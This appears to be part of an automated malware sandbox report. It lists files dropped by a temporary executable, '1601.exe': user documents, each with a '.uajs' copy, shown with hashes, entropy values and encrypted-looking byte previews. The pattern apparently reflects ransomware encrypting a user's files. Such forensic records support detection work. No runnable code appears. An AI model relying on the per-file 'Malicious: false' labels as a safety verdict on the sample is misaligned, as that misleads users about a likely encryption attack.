SHA-512:	3FFCD6B7CE18A8F884111E4F592941D6FE7629ECFE2DD75FEA52F265F699D7370F26C1E28D93DCF9198B813460AF0F572B6B496D390D53F4209F81F8E94C7556
Malicious:	false
Preview:	DUUDT.yXw..^....}..j.;.74/K.P..1..t.Q..."f....$'.1y.c.V`.P>b..M6.9$..7.2..9syp....B.Z....Y.>..........f;.7\|,q..y.i..9.....s...`.....H..UB.... Q..J..sR\..A....]...d5...NrQ.l...3..4G...sL...oJ.>.,.P......(.K.cJ(.Dd..k..h....8".m....n4.....SW.3.....4T.Q.9c.Z.R&...#.wb0,C...^&.L.08..>#.Hf.8....\f.ag..~s...]..l...wl...5..(.ifyW..h.=lc.3.R.lZ..G.Gc..O$.../m?....o.{Z....O@..._.Yi..lr....P.D,.....(...v...0.V....,..........Dl.1..q~.<&.a.7.......>.x&.9..C.'.\.K V..V.3.Q.....ZZ.\|...=.3g.[j.pE...{_.`.....j...qF..h..E............}L_....l0}...[G"...]...8^..gtJ..x,....X...s.XW.e;..`.a0..k.5$.....M.......8-..NC\}.....d. _.....7._...[.7.yd.~...`&r..R..&P.Q].v..=fT..OY.....-.5.....B..j.....i....s.X44f...y...>Z.I.[.A.R..m.8I.9`......e.............Zd......@.$.qrr...p.z..17a..P..n..X.\|...(#.S..yc..']i.s.G.....l!.v.BJ....j8p~.'ONKYRs.h.u.._....l...V....Eum..S..t.'..0..RF.t..#..r..........0....o..?.:0...&9..S-.DL..W....Q..a..a..._....../...O.]......G

C:\Users\user\Documents\EIVQSAOTAQ.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842253680105038
Encrypted:	false
SSDEEP:	24:R2uBlf+J2l9/v87k4uGiUayaNVETC86E5/g4u4JStWsKmDo6MyrisHw1bD:kuBNvsFlaUTCt6gj4AWXYot7EyD
MD5:	59B2AE2FE421F2C50BB90338FD3BA96C
SHA1:	CE09564FAEE3D09163FB2BAFEC05CEB5D390BD9F
SHA-256:	27AD4ACF3B095C0ACAA94D62C2157F96C889439D1767E8E590A474C66E88D892
SHA-512:	2349FEF787AF166EC0395B86F7ED6083CFD366B30D56C529A64F89A3F5C7D07F3254E10D62EE27A7F09B10A87E60918AE65C697B221C27475D032D2C90CA98C3
Malicious:	false
Preview:	EIVQS....^.k=CV.......w..]e.....x8.._I .....U.'......(H..PH...i...r..Im..l...]..>...8d..;....!. ....DmV@r.Y._.k...2..#;........}<P..%Z...t.Fb...%....&.......G..... ._.....$......h..F.n.@....R..N.<.G.k;. ..M....tb0.z.E<......O.e..Bk..v.;qk.W...P..U..C...lV...J..u=,r....e4-p.l..^..7......R..]?\F...p\|.!"......d...f..=Z/..W..{@I.V.....hj..2...x._..n]....j.&.4. n...7W:&......?...r..;.b....H].:.C#O...+...s.G...{^lTP.^.]u..a....1p.C.......D... .....D...QR.wQ.k..vY<...\._...Z.....x.F$9..8E......7.......\|...).~.......}XU..n..z....a.]NJ.J..8f..-_.7..5<Rg..DX..Z....r.}.7?..m..}...:8....KG.."m.F.j..wA).......B..!......c$Nx.{^....zA.y.......uT....N%&.z...hM......%<.j..,...d.].IT..Uew.U`.%Q.v.I...X..m?.,.......1F.7R.B.,.?.L8....<{.*.>./...oB7.b.....j&....E..f.....<pX...;b..kg.2.o.`.);+.MI....9..xg..%U.............cl..4.}379.N}.>h..vIS_...2e../.@\i.B.I.yl.cF..9=...+...!..d_..[.....Fs..1.$........B..3.N.J..x.US.W.+w.N......d..Yw.<....N.^X'0..u6....8.k8

C:\Users\user\Documents\EIVQSAOTAQ.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842253680105038
Encrypted:	false
SSDEEP:	24:R2uBlf+J2l9/v87k4uGiUayaNVETC86E5/g4u4JStWsKmDo6MyrisHw1bD:kuBNvsFlaUTCt6gj4AWXYot7EyD
MD5:	59B2AE2FE421F2C50BB90338FD3BA96C
SHA1:	CE09564FAEE3D09163FB2BAFEC05CEB5D390BD9F
SHA-256:	27AD4ACF3B095C0ACAA94D62C2157F96C889439D1767E8E590A474C66E88D892
SHA-512:	2349FEF787AF166EC0395B86F7ED6083CFD366B30D56C529A64F89A3F5C7D07F3254E10D62EE27A7F09B10A87E60918AE65C697B221C27475D032D2C90CA98C3
Malicious:	false
Preview:	EIVQS....^.k=CV.......w..]e.....x8.._I .....U.'......(H..PH...i...r..Im..l...]..>...8d..;....!. ....DmV@r.Y._.k...2..#;........}<P..%Z...t.Fb...%....&.......G..... ._.....$......h..F.n.@....R..N.<.G.k;. ..M....tb0.z.E<......O.e..Bk..v.;qk.W...P..U..C...lV...J..u=,r....e4-p.l..^..7......R..]?\F...p\|.!"......d...f..=Z/..W..{@I.V.....hj..2...x._..n]....j.&.4. n...7W:&......?...r..;.b....H].:.C#O...+...s.G...{^lTP.^.]u..a....1p.C.......D... .....D...QR.wQ.k..vY<...\._...Z.....x.F$9..8E......7.......\|...).~.......}XU..n..z....a.]NJ.J..8f..-_.7..5<Rg..DX..Z....r.}.7?..m..}...:8....KG.."m.F.j..wA).......B..!......c$Nx.{^....zA.y.......uT....N%&.z...hM......%<.j..,...d.].IT..Uew.U`.%Q.v.I...X..m?.,.......1F.7R.B.,.?.L8....<{.*.>./...oB7.b.....j&....E..f.....<pX...;b..kg.2.o.`.);+.MI....9..xg..%U.............cl..4.}379.N}.>h..vIS_...2e../.@\i.B.I.yl.cF..9=...+...!..d_..[.....Fs..1.$........B..3.N.J..x.US.W.+w.N......d..Yw.<....N.^X'0..u6....8.k8

C:\Users\user\Documents\EIVQSAOTAQ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8600146135117654
Encrypted:	false
SSDEEP:	24:RB6hZtjAglYW+XuGyCM9LXgRgPYzw+COjU8Z5iHLijIXNGniH/xvAUaF8+w1bD:q5LYlXu1zlWgwkijUxriSNGnifpAj1yD
MD5:	39766389EE5416CD5C04D6525978D5B8
SHA1:	026DBA2A088887A30883A4FA045B5265A3D14F24
SHA-256:	41B3A1923E0590D36CC3E1CE7632769F52493181FEC4478397F4916657EE62D5
SHA-512:	DEF08199E7683B31361CE569D41CEC5D88BE3098DCDEAECDFF2D5F2EB391D9D73D2B573EA8044D23A11B6316FB880D7BA9883A438E5135302613A38B24BAD0B9
Malicious:	false
Preview:	EIVQS=W(..94..f.....}.o...].=....5;Rx...<.e...G......s...1._...Z.kd...%.<....W.$h.V....!J%.......m......7l...g!...:...a..........hA/.. X.m.uIk...h.y\6...gfWG.5.%).....i-W.#......i...).c..gI..}:..Hy....W..& ....Ia]W.B.....:.m.E.h..F...+.#..jO...Sn.3.x...x......4.Q....0.k..-.ag..T......H..Vh...3.C..Kr...............C.@..j......0..`.@...t.6[.s.5...w/....4Nq....y...?.......>.......T...9Ysg.......@...i.>M.... .s.Fx....d..{uz..y.5......p.)!4...#`N.!..:...8i.j&..@W..Z?.9.o.#........y..q...7..3...C......sh.....s.....C@...#g.k....Lg2A...k.+..e.....9...>..X..'B7."~B.$.\....+.{x.Do..N......2]S .jGOW8J.D..B;.(.4y..K..l.z..Sd9.p.6.L....>...L..V.;.kK.m2$}P.h.....0..4..t..3.2,....].b.[.=\|.._R..i.....L.;......Q........!.....Qd.......O..`g......s....?..1N...1sU.Q.`..q[.@.......q.....]f......=.(..p.w!..V....Q...w.d7(. ....a.F...........XM5.B..>.s...E.$....P}e.....x...6.g...X<........"....._.YE..C^.._....eO...n21...l&'....wa.d...p!..i..^p.T...Y.....Xl

C:\Users\user\Documents\EIVQSAOTAQ.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8600146135117654
Encrypted:	false
SSDEEP:	24:RB6hZtjAglYW+XuGyCM9LXgRgPYzw+COjU8Z5iHLijIXNGniH/xvAUaF8+w1bD:q5LYlXu1zlWgwkijUxriSNGnifpAj1yD
MD5:	39766389EE5416CD5C04D6525978D5B8
SHA1:	026DBA2A088887A30883A4FA045B5265A3D14F24
SHA-256:	41B3A1923E0590D36CC3E1CE7632769F52493181FEC4478397F4916657EE62D5
SHA-512:	DEF08199E7683B31361CE569D41CEC5D88BE3098DCDEAECDFF2D5F2EB391D9D73D2B573EA8044D23A11B6316FB880D7BA9883A438E5135302613A38B24BAD0B9
Malicious:	false
Preview:	EIVQS=W(..94..f.....}.o...].=....5;Rx...<.e...G......s...1._...Z.kd...%.<....W.$h.V....!J%.......m......7l...g!...:...a..........hA/.. X.m.uIk...h.y\6...gfWG.5.%).....i-W.#......i...).c..gI..}:..Hy....W..& ....Ia]W.B.....:.m.E.h..F...+.#..jO...Sn.3.x...x......4.Q....0.k..-.ag..T......H..Vh...3.C..Kr...............C.@..j......0..`.@...t.6[.s.5...w/....4Nq....y...?.......>.......T...9Ysg.......@...i.>M.... .s.Fx....d..{uz..y.5......p.)!4...#`N.!..:...8i.j&..@W..Z?.9.o.#........y..q...7..3...C......sh.....s.....C@...#g.k....Lg2A...k.+..e.....9...>..X..'B7."~B.$.\....+.{x.Do..N......2]S .jGOW8J.D..B;.(.4y..K..l.z..Sd9.p.6.L....>...L..V.;.kK.m2$}P.h.....0..4..t..3.2,....].b.[.=\|.._R..i.....L.;......Q........!.....Qd.......O..`g......s....?..1N...1sU.Q.`..q[.@.......q.....]f......=.(..p.w!..V....Q...w.d7(. ....a.F...........XM5.B..>.s...E.$....P}e.....x...6.g...X<........"....._.YE..C^.._....eO...n21...l&'....wa.d...p!..i..^p.T...Y.....Xl

C:\Users\user\Documents\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845241352549925
Encrypted:	false
SSDEEP:	24:cXP9ddIyZyD65n7u4bt4S0TIufGBSEEaqT7c7QgwdDGnOw1bD:cXtI1my4m5TIuudEFT7cQgwdDGnOyD
MD5:	BA679CD2C6DDB8106B83ECB777CE7388
SHA1:	407334B9CDC40CF0B326CF68DF1894C9B51FD31B
SHA-256:	9E79D3BB87F06A50276120344203ECDE1A6C378012E6F1DB3EA3FE86FCE85727
SHA-512:	4D3777EC95D5369C4E5EAFED3AC37E2BF4BDD95A9F1E0987CBA823608B1FEBA11486A45311A06AA350AB11D5FB7F880CEA027B80CA09948F5D69B4E08577ED1B
Malicious:	false
Preview:	EOWRV..F..lR.%g.......X28.8.../...! L...../H..i7..j..4...6Sz....;.BdI.{.PC.L....!.M..].;...ND.O.]y.N(.T.Z....S...P_a....y&=.S.\.d....1..1..l...+x..+..(.><..u.B.N9".^..\_.#G..!...Z]6....Nnp..k....S+..L.Mh.F.......J.........N..X.~....3...:....I]....~R..ww.-tl...l.`..ls..z.(..@.;...z...4:.......k....4........M....<6..8..V?...&&...;.x_d...$......_6l.......j....e....P.~...r.-...H.......q.....P.....?.PVW....dH.....!..nJg$6..........\......'#s.S.....6.~/.:..T..._....6..c....Q.;.M..#2..a..qJ....b+.&.r.}q.p9FS/..m..^...Ng=\|.....58..Y ...( ..q...`.<.$.M..7.kL.,.....&+f!..d.N..2....<...34...........aJ,.aw<.v{...?X.0D.2..^7..2!...VL.....o..-.Q.a....b.jQ....u....7.O...?.}.i.....E.:.....>=...SM.$k...!...j.u\|...l./e.....M...D..LS......r....X'.\|.z.5.f&...^.E;2l....y.g6[b.U$G..9.$.,[.......??OP..l..!AO..D.\|.E:.!.z..K..yB..?....4..\|....q..X...<...D.[..b.)C..18."vk........z...\|1\\^.L.d1M/.Q.B...F>.....X..[..m.. 4.1..W........Q...Z5..V...Q...E

C:\Users\user\Documents\EOWRVPQCCS.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845241352549925
Encrypted:	false
SSDEEP:	24:cXP9ddIyZyD65n7u4bt4S0TIufGBSEEaqT7c7QgwdDGnOw1bD:cXtI1my4m5TIuudEFT7cQgwdDGnOyD
MD5:	BA679CD2C6DDB8106B83ECB777CE7388
SHA1:	407334B9CDC40CF0B326CF68DF1894C9B51FD31B
SHA-256:	9E79D3BB87F06A50276120344203ECDE1A6C378012E6F1DB3EA3FE86FCE85727
SHA-512:	4D3777EC95D5369C4E5EAFED3AC37E2BF4BDD95A9F1E0987CBA823608B1FEBA11486A45311A06AA350AB11D5FB7F880CEA027B80CA09948F5D69B4E08577ED1B
Malicious:	false
Preview:	EOWRV..F..lR.%g.......X28.8.../...! L...../H..i7..j..4...6Sz....;.BdI.{.PC.L....!.M..].;...ND.O.]y.N(.T.Z....S...P_a....y&=.S.\.d....1..1..l...+x..+..(.><..u.B.N9".^..\_.#G..!...Z]6....Nnp..k....S+..L.Mh.F.......J.........N..X.~....3...:....I]....~R..ww.-tl...l.`..ls..z.(..@.;...z...4:.......k....4........M....<6..8..V?...&&...;.x_d...$......_6l.......j....e....P.~...r.-...H.......q.....P.....?.PVW....dH.....!..nJg$6..........\......'#s.S.....6.~/.:..T..._....6..c....Q.;.M..#2..a..qJ....b+.&.r.}q.p9FS/..m..^...Ng=\|.....58..Y ...( ..q...`.<.$.M..7.kL.,.....&+f!..d.N..2....<...34...........aJ,.aw<.v{...?X.0D.2..^7..2!...VL.....o..-.Q.a....b.jQ....u....7.O...?.}.i.....E.:.....>=...SM.$k...!...j.u\|...l./e.....M...D..LS......r....X'.\|.z.5.f&...^.E;2l....y.g6[b.U$G..9.$.,[.......??OP..l..!AO..D.\|.E:.!.z..K..yB..?....4..\|....q..X...<...D.[..b.)C..18."vk........z...\|1\\^.L.d1M/.Q.B...F>.....X..[..m.. 4.1..W........Q...Z5..V...Q...E

C:\Users\user\Documents\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850937058839589
Encrypted:	false
SSDEEP:	24:CKujn8F9qdzDm7t02tNotNIATvzx6oIarH8RBCA2ITEmKP3gm6Xw1bD:C2im7t9tNokBnCA2Ixy3V6XyD
MD5:	409304BFC6887E525DA67E055A322A49
SHA1:	D25F05C45908AA30785C4C1B1DE61682CAE80234
SHA-256:	74D947ED9C2DF4EF09B737BFAF9BDB3A8FA0D0E10CD843B64D380CEB7C0DD539
SHA-512:	10A9316691A649E6E66044F1FF9BF855391CF466A86C6ED4B7A63D484BDE778F8366BD54726D476682F2278A8DE5DE25AE3A3FEF7C2B684E91F7078703B92584
Malicious:	false
Preview:	EOWRVCP....0.#h..{..........S........H.8.....0f#.@z.-.[.[...O..M. \...y.lG .I#._.bHj......\|...8.....gS..m.q.!1.4..x..w.. ^B.."...C.2..P.+.=\|.......@x.'].{.aLcY..B.......Z.6.,.yh\|U........?k....k?..........4,.op.l$.=H.oY...7Yto.."...5.u.u7BSpr...GE...V....x>...1/...s0t=.,..p.........VO..~..y...#P.W~.....W.j.o..[..f[.,..\0...@...3....JL..D..A.D..%.rp.s/..b..wC.n.{^6].+...M.X..{E...C.o].X...ZR..{/..>...?.@..f..rN.h..)...S....\|^....=.c......K.\|.;.{.....h.g..l!A.o....i.eP..A...k0.G.s.._....D.&..(V...v.yY.....U..&.%9...9mW7.........X....q...kY..S.e.O.2n....>r.....$..X..+.y.^.....H e8.,..h2?9.".'.....G..P...0.......W.g..4.j..F..]>.s.!...r.d.p/W?..9.Z.x.\|.......b..Y.fb.<.DowSJ.$.lo.n.b.$:...W.....4..4r..h `.."\|..?.-...e.L...;..ohz..........>...1.Q(.0...F$....IXo.?...L.vP...Ng'.......57D.../...+.....s."s3aSLq.>..=...(..!..h.L ....=...Ra0...~..U.B.?t{.DS+.. J..E."..f.a..1.2.\|..]..QI%..koK.W...E.........zL-....J.@....D.....V,.9.Z3t9...Y.5\.....0.".....E

C:\Users\user\Documents\EOWRVPQCCS.pdf.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850937058839589
Encrypted:	false
SSDEEP:	24:CKujn8F9qdzDm7t02tNotNIATvzx6oIarH8RBCA2ITEmKP3gm6Xw1bD:C2im7t9tNokBnCA2Ixy3V6XyD
MD5:	409304BFC6887E525DA67E055A322A49
SHA1:	D25F05C45908AA30785C4C1B1DE61682CAE80234
SHA-256:	74D947ED9C2DF4EF09B737BFAF9BDB3A8FA0D0E10CD843B64D380CEB7C0DD539
SHA-512:	10A9316691A649E6E66044F1FF9BF855391CF466A86C6ED4B7A63D484BDE778F8366BD54726D476682F2278A8DE5DE25AE3A3FEF7C2B684E91F7078703B92584
Malicious:	false
Preview:	EOWRVCP....0.#h..{..........S........H.8.....0f#.@z.-.[.[...O..M. \...y.lG .I#._.bHj......\|...8.....gS..m.q.!1.4..x..w.. ^B.."...C.2..P.+.=\|.......@x.'].{.aLcY..B.......Z.6.,.yh\|U........?k....k?..........4,.op.l$.=H.oY...7Yto.."...5.u.u7BSpr...GE...V....x>...1/...s0t=.,..p.........VO..~..y...#P.W~.....W.j.o..[..f[.,..\0...@...3....JL..D..A.D..%.rp.s/..b..wC.n.{^6].+...M.X..{E...C.o].X...ZR..{/..>...?.@..f..rN.h..)...S....\|^....=.c......K.\|.;.{.....h.g..l!A.o....i.eP..A...k0.G.s.._....D.&..(V...v.yY.....U..&.%9...9mW7.........X....q...kY..S.e.O.2n....>r.....$..X..+.y.^.....H e8.,..h2?9.".'.....G..P...0.......W.g..4.j..F..]>.s.!...r.d.p/W?..9.Z.x.\|.......b..Y.fb.<.DowSJ.$.lo.n.b.$:...W.....4..4r..h `.."\|..?.-...e.L...;..ohz..........>...1.Q(.0...F$....IXo.?...L.vP...Ng'.......57D.../...+.....s."s3aSLq.>..=...(..!..h.L ....=...Ra0...~..U.B.?t{.DS+.. J..E."..f.a..1.2.\|..]..QI%..koK.W...E.........zL-....J.@....D.....V,.9.Z3t9...Y.5\.....0.".....E

C:\Users\user\Documents\EOWRVPQCCS\EIVQSAOTAQ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849691492297271
Encrypted:	false
SSDEEP:	24:RIknCVlfpk+HRRlZLFvlaHAAYL5TrNGj6RvSeJI+fCJcnIKZbiw1bD:KknG5p3xRbfL5I6ZPVIKEyD
MD5:	3589623B80F0D1F24DE1B1335E9442C4
SHA1:	CAF715F5324CC9A1596C6F8A91DF974E189292A8
SHA-256:	359241D46304B9517805227E8CBD9285130D4C33EBA5BB1F49A0BDAD424E3FAC
SHA-512:	87E579E2E8EC5B60B164C5EC1000BCC659044FE687E6D068721A9C418929DCABCFA2845704B0B86D6058F43D86D842D1E96936E326DB46A9DC262879966C1CF5
Malicious:	false
Preview:	EIVQS...._...Z..b..-.c......a....pG.....L...\'....%tD..#.Q;'..yK.S..f/.&...CB.ts....U..nq.\|7..E30..8..7-..%...k.....HFb-..>.:.48...~.4.\|G....uEh.6I....f.........`......(.....L...W..X#..No].N.5w..:.....0j.h t..;"......}.VXU.....pcJ...iI..c..\^.X..(.9.5./.40VU........."..2&...{...h'R0...Y.j.r.s..A..u.@./e...........!.....v%.hw.KZ".?.m.c...+....s.~hq...+...B.0...KzA.tx.I`.+.dE%...d......_...L.......1...7.T..C...Rq...;c..O.sT7.n..J.F....HB..J.oH.g..F......T.N.<......I....r.p.o....2.s...F..oD^.Kb.....E.4@VU.....l.....Q......46.!!._..Vf.f.w.H...r...u4.4..#..t.2._.T~..O..H..b.g-.......~$.....K.3...i..,p....,...1J.=..kg.....f....Ri.Y.u/H...P7p.@...0....\..Q.K/...?....Y......e".^.z}M4......M..HA.L.g..^.6x./'5...._89 +P,..J.F&..2..J.<.])..P....J...D(....L.......W/.........6Y..9X..._Jpv.....4KE.1C1.u\|K....E.,.z.c=Ec.h.......k......%...u...%P+...2.....Q.C6v5:.c...`QL.*...&. .Y...9.....y...;.Z ......S..e..:...&c..W.=...0.+~(...AA..&.

C:\Users\user\Documents\EOWRVPQCCS\EIVQSAOTAQ.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849691492297271
Encrypted:	false
SSDEEP:	24:RIknCVlfpk+HRRlZLFvlaHAAYL5TrNGj6RvSeJI+fCJcnIKZbiw1bD:KknG5p3xRbfL5I6ZPVIKEyD
MD5:	3589623B80F0D1F24DE1B1335E9442C4
SHA1:	CAF715F5324CC9A1596C6F8A91DF974E189292A8
SHA-256:	359241D46304B9517805227E8CBD9285130D4C33EBA5BB1F49A0BDAD424E3FAC
SHA-512:	87E579E2E8EC5B60B164C5EC1000BCC659044FE687E6D068721A9C418929DCABCFA2845704B0B86D6058F43D86D842D1E96936E326DB46A9DC262879966C1CF5
Malicious:	false
Preview:	EIVQS...._...Z..b..-.c......a....pG.....L...\'....%tD..#.Q;'..yK.S..f/.&...CB.ts....U..nq.\|7..E30..8..7-..%...k.....HFb-..>.:.48...~.4.\|G....uEh.6I....f.........`......(.....L...W..X#..No].N.5w..:.....0j.h t..;"......}.VXU.....pcJ...iI..c..\^.X..(.9.5./.40VU........."..2&...{...h'R0...Y.j.r.s..A..u.@./e...........!.....v%.hw.KZ".?.m.c...+....s.~hq...+...B.0...KzA.tx.I`.+.dE%...d......_...L.......1...7.T..C...Rq...;c..O.sT7.n..J.F....HB..J.oH.g..F......T.N.<......I....r.p.o....2.s...F..oD^.Kb.....E.4@VU.....l.....Q......46.!!._..Vf.f.w.H...r...u4.4..#..t.2._.T~..O..H..b.g-.......~$.....K.3...i..,p....,...1J.=..kg.....f....Ri.Y.u/H...P7p.@...0....\..Q.K/...?....Y......e".^.z}M4......M..HA.L.g..^.6x./'5...._89 +P,..J.F&..2..J.<.])..P....J...D(....L.......W/.........6Y..9X..._Jpv.....4KE.1C1.u\|K....E.,.z.c=Ec.h.......k......%...u...%P+...2.....Q.C6v5:.c...`QL.*...&. .Y...9.....y...;.Z ......S..e..:...&c..W.=...0.+~(...AA..&.

C:\Users\user\Documents\EOWRVPQCCS\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862636455612975
Encrypted:	false
SSDEEP:	24:1GUQIGAZICNANVgYBPLQCGL2X8sfaieqpNoCS8/kXzIo29Qnlp3J5zxyOadM8w1X:1GlQZNwDx22haitNJS8/8zIoOQH33ztn
MD5:	BE6F79CC54C5C209DDDE79ACA8E1697A
SHA1:	68EEFC82319E26E97FCB198287FAF19178A067D5
SHA-256:	34A7468ED0981046A0AAE5E009CDCC9C6F5238B2FBCD2B48838CD6D5037570FB
SHA-512:	DCF3EC7A529AB2361DEB09C75530427273AB52BA3021D5B7F599E8CB244D07D5DC420B2538EFDCA4AB22C5CDB07D736E257B7E946C2A006BE6D50B9B50235F4D
Malicious:	false
Preview:	EOWRV...+...MrL./.k.....a.\|..C....R..........\|.J...{...N!E(.\6.^.(..Ua6..?.....o+=z..s@Q.0pj............4..0$.<..........rS..J...c.\.f.%..ut.M.......e.....O.;..\.@.....u.qm%..?...T.....l......\|&A.Q...(...h..bL.LW.7....>..d.#....#0......N.w......yf..d.O.0...PaeT......2Z........aP...vv.R..%.<.^.'.2Q..G.P.;..MC..5.8.rxD.....''.a.....S2f..[.;.Jas...Hqv3.'...+H...O........Uay@p.;.H."..\|dl...~.D..z..M...k...[)P.T?C.Ga.h..hP..z...Q.??..d...........d.&..Z'$...a..Js..O...67..~...B...].PCmZ...\|&.yy..a.K...e\s..`?.h.....x.U..[{dld". .....2(.?..2X.\|...z..Gw.u.P;..?%.,..[S.A!.[....o.q.......h..U..q .l......s..F....[..C.%$.UA...'K.)......O)...^.J...L.&.w..cZ...1..1[....._c2.k..j..4.&........2.@....1..E.GMq....G...u..+tQ!T.S..I..x..+....[[...]...]......ln... .H.#8....g...f!..fw.!y..... ..ub.M.pe..!.....#..y.q.h.u......:...C..*..>x....=p..@.....\.g~...m9:2...=./.............J..E.F.9n.:..}.T.h.".<.F..f!........:6.t$.. .?.W}O^...5u..Ok..p.S.Y...P..)..

C:\Users\user\Documents\EOWRVPQCCS\EOWRVPQCCS.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862636455612975
Encrypted:	false
SSDEEP:	24:1GUQIGAZICNANVgYBPLQCGL2X8sfaieqpNoCS8/kXzIo29Qnlp3J5zxyOadM8w1X:1GlQZNwDx22haitNJS8/8zIoOQH33ztn
MD5:	BE6F79CC54C5C209DDDE79ACA8E1697A
SHA1:	68EEFC82319E26E97FCB198287FAF19178A067D5
SHA-256:	34A7468ED0981046A0AAE5E009CDCC9C6F5238B2FBCD2B48838CD6D5037570FB
SHA-512:	DCF3EC7A529AB2361DEB09C75530427273AB52BA3021D5B7F599E8CB244D07D5DC420B2538EFDCA4AB22C5CDB07D736E257B7E946C2A006BE6D50B9B50235F4D
Malicious:	false
Preview:	EOWRV...+...MrL./.k.....a.\|..C....R..........\|.J...{...N!E(.\6.^.(..Ua6..?.....o+=z..s@Q.0pj............4..0$.<..........rS..J...c.\.f.%..ut.M.......e.....O.;..\.@.....u.qm%..?...T.....l......\|&A.Q...(...h..bL.LW.7....>..d.#....#0......N.w......yf..d.O.0...PaeT......2Z........aP...vv.R..%.<.^.'.2Q..G.P.;..MC..5.8.rxD.....''.a.....S2f..[.;.Jas...Hqv3.'...+H...O........Uay@p.;.H."..\|dl...~.D..z..M...k...[)P.T?C.Ga.h..hP..z...Q.??..d...........d.&..Z'$...a..Js..O...67..~...B...].PCmZ...\|&.yy..a.K...e\s..`?.h.....x.U..[{dld". .....2(.?..2X.\|...z..Gw.u.P;..?%.,..[S.A!.[....o.q.......h..U..q .l......s..F....[..C.%$.UA...'K.)......O)...^.J...L.&.w..cZ...1..1[....._c2.k..j..4.&........2.@....1..E.GMq....G...u..+tQ!T.S..I..x..+....[[...]...]......ln... .H.#8....g...f!..fw.!y..... ..ub.M.pe..!.....#..y.q.h.u......:...C..*..>x....=p..@.....\.g~...m9:2...=./.............J..E.F.9n.:..}.T.h.".<.F..f!........:6.t$.. .?.W}O^...5u..Ok..p.S.Y...P..)..

C:\Users\user\Documents\EOWRVPQCCS\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85399182386997
Encrypted:	false
SSDEEP:	24:lIFzAyTP0/xlu1slTi89w+GCR/CXF9Ma4SrUREJDo7L858KTI8LS9Ww1bD:GRgu10Tx9w+GCYzPruyoH85nIGSgyD
MD5:	58CACE2ACE299F5DFBA1E6FFF7316789
SHA1:	C8CFAA4528138F4F2ED523C779B7C5AF33314907
SHA-256:	D630F0DD0C6FB810F1C7BB795CBDA16A6603A27977BD1A7BEABEBAFED765F38C
SHA-512:	F7F93DA107F0F606A72A0BF3FC5D0C890F6AA606A2A48EE395C398890A2FA4E7B1E67481E9F94C87531D5AC54CBE5AEC857B507069F720EC9631653FC8012A37
Malicious:	false
Preview:	GIGIY.Ry......d..5\....#{.;.b0..7...D...4...}_.....g.....@.......EYAR.-.~vM=..~.u,.?i..,.r...%.".RN>.TrmX$..K.C]d........Bm.L...(mI....R..^..O}y......FO.C..'[.2.....w........f..0...P(I`f.#...1.?.D...+...RKT...@........@..TSU8yj&x.r..g..v!..,.sb1e........&..........4..._......5..g..".........@.@_V.d.o.4..#J.....b\sqi.{.Gk..%.6....9....a.Y.V.....V....[.v..=.Br..&.pkA!..@?....(M...z.z...1$}..\......Y.'5.....0.qW..<.t.ZP ....%7......u.(......:....D..:Y...1.{.@.w..N~.v.b......W.^>j.#).DnNq>.2.T...?Zq.L..&...A".....d._....H....3..4+~R!....My...;H....E...v.KA:fn.k@Bx....Dy1l.>)...+L..B.%...%AM.{....Y...d.=zKN.@3>...S.5Zo.,....{.. z+8@J...6.....;L.gJ.>..-.V.B.}s..&...l....Vn.\.M.5..a......k.J..a...J&.n.;P.......nL.]..'.L....~!......._t`...d..1..!:..5..&.,.x].f.X..?.c&...../A6ei..P......J...I.......~@v..9..._....]v.E....IA...y.p....+..o..:.....`F.mst..T7......ML...X5.].....b.c.9....G0.KEw..nAF ....dN..9.....6......+....]....u.....ka..;3.[..\

C:\Users\user\Documents\EOWRVPQCCS\GIGIYTFFYT.pdf.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85399182386997
Encrypted:	false
SSDEEP:	24:lIFzAyTP0/xlu1slTi89w+GCR/CXF9Ma4SrUREJDo7L858KTI8LS9Ww1bD:GRgu10Tx9w+GCYzPruyoH85nIGSgyD
MD5:	58CACE2ACE299F5DFBA1E6FFF7316789
SHA1:	C8CFAA4528138F4F2ED523C779B7C5AF33314907
SHA-256:	D630F0DD0C6FB810F1C7BB795CBDA16A6603A27977BD1A7BEABEBAFED765F38C
SHA-512:	F7F93DA107F0F606A72A0BF3FC5D0C890F6AA606A2A48EE395C398890A2FA4E7B1E67481E9F94C87531D5AC54CBE5AEC857B507069F720EC9631653FC8012A37
Malicious:	false
